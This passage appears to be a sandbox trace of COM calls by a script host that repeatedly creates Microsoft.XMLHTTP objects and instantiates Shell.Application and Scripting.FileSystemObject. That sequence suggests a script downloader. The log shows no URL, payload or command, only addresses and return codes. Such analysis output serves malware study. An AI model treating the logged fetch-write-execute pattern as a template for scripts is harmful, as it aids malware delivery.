	[0470.958] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c30, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0470.958] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0470.958] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0470.958] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c30, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0470.958] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0470.958] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0470.959] SysStringLen (param_1=0x0) returned 0x0
	[0470.959] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0470.959] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0470.959] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x64ef310) returned 0x0
	[0470.959] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0470.959] Shell:IUnknown:QueryInterface (in: This=0x64ef310, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x64ef350) returned 0x0
	[0470.959] ??2@YAPEAX_K@Z () returned 0x62f350
	[0470.959] Shell:IObjectWithSite:SetSite (This=0x64ef350, pUnkSite=0x62f350) returned 0x0
	[0470.959] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0470.959] Shell:IUnknown:Release (This=0x64ef350) returned 0x1
	[0470.959] Shell:IUnknown:QueryInterface (in: This=0x64ef310, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x64ef310) returned 0x0
	[0470.959] Shell:IUnknown:AddRef (This=0x64ef310) returned 0x3
	[0470.959] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0470.959] SysStringLen (param_1=0x0) returned 0x0
	[0470.959] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0470.963] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0470.963] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0470.963] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0470.963] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0470.963] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0470.963] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0472.198] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0472.198] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c30, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0472.198] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0472.200] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0472.200] SysStringLen (param_1=0x0) returned 0x0
	[0472.200] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0472.200] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0472.200] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c30) returned 0x0
	[0472.201] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0472.201] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0472.201] ??2@YAPEAX_K@Z () returned 0x62f310
	[0472.201] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0472.201] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0472.201] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0472.201] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c30) returned 0x0
	[0472.201] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c30) returned 0x3
	[0472.201] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0472.201] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c30, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0472.204] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0472.204] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0472.204] SysStringLen (param_1=0x0) returned 0x0
	[0472.204] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0472.204] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0472.204] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74a0) returned 0x0
	[0472.204] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0472.204] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7508) returned 0x0
	[0472.205] ??2@YAPEAX_K@Z () returned 0x62f330
	[0472.205] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7508, pUnkSite=0x62f330) 
	[0472.205] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0472.205] XMLHTTPRequest:IUnknown:Release (This=0x49c7508) returned 0x0
	[0472.205] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74a0) returned 0x0
	[0472.205] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74a0) returned 0x3
	[0472.205] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0472.205] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0472.205] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0472.205] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0472.205] SysStringLen (param_1=0x0) returned 0x0
	[0472.206] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0472.206] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0472.206] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b90) returned 0x0
	[0472.206] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0472.206] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0472.206] ??2@YAPEAX_K@Z () returned 0x62f310
	[0472.206] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0472.206] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0472.206] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0472.206] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b90) returned 0x0
	[0472.206] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b90) returned 0x3
	[0472.206] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0472.207] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b90, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0472.207] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0472.207] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0472.207] SysStringLen (param_1=0x0) returned 0x0
	[0472.207] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0472.207] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0472.207] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bf0) returned 0x0
	[0472.207] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0472.207] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7508) returned 0x0
	[0472.207] ??2@YAPEAX_K@Z () returned 0x62f330
	[0472.207] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7508, pUnkSite=0x62f330) 
	[0472.207] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0472.207] XMLHTTPRequest:IUnknown:Release (This=0x49c7508) returned 0x0
	[0472.208] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bf0) returned 0x0
	[0472.208] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bf0) returned 0x3
	[0472.208] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0472.208] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bf0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0472.208] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0472.208] longjmp () 
	[0472.208] longjmp () 
	[0472.208] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0472.208] SysStringLen (param_1=0x0) returned 0x0
	[0472.208] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0472.209] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
